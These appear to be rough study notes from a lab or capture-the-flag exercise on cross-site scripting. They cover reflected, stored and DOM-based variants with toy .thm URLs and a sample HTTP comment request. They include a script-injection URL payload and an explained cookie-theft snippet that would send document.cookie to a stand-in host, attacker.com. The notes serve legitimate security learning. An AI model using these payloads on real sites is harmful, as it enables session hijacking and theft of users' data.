XSS

Types

Refected

You see reflected variants when the injection is immediately projected in a response. Imagine a toy search function in an online toy store, you search via:

https://trygiftme.thm/search?term=gift

But imagine you send this to your friend who is looking for a gift for their nephew (please don't do this):

https://trygiftme.thm/search?term=<script>alert( atob("VEhNe0V2aWxfQnVubnl9") )</script>

If your friend clicks on the link, it will execute code instead.

Impact

You could act, view information, or modify information that your friend or any user could do, view, or access. It's usually exploited via phishing to trick users into clicking a link with malicious code injected.

Stored

A Stored XSS attack occurs when malicious script is saved on the server and then loaded for every user who views the affected page. Unlike Reflected XSS, which targets individual victims, Stored XSS becomes a "set-and-forget" attack, anyone who loads the page runs the attacker’s script.

To understand how this works, let’s use the example of a simple blog where users can submit comments that get displayed below each post.

Normal Comment Submission

POST /post/comment HTTP/1.1
Host: tgm.review-your-gifts.thm

postId=3
name=Tony Baritone
[email protected]
comment=This gift set my carpet on fire but my kid loved it!

The server stores this information and displays it whenever someone visits that blog post.

Malicious Comment Submission (Stored XSS Example)

If the application does not sanitize or filter input, an attacker can submit JavaScript instead of a comment:

Because the comment is saved in the database, every user who opens that blog post will automatically trigger the script.

This lets the attacker run code as if they were the victim in order to perform malicious actions such as:

• Steal session cookies

• Trigger fake login popups

• Deface the page

DOM Based

Test Payloads

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

DOM Based

Nothing is sent to server

Stored XSS

First check for HTTP Injection

Then go for XSS

Stealing Cookie

Add /? to the link to make cookie a parameter

• var i = new Image;

  • Creates a new Image object in JavaScript. This is commonly used to send data to a server without triggering any visible browser behavior.

• i.src = ""+ document.cookie;

  • Sets the image's source URL to the contents of document.cookie, which is a string containing all the cookies available to the current page.

  • Since the URL is empty (""), this won't actually send the cookie anywhere, but if the empty string was replaced with a URL (e.g., http://attacker.com?c=), it would send the cookie to the attacker’s server.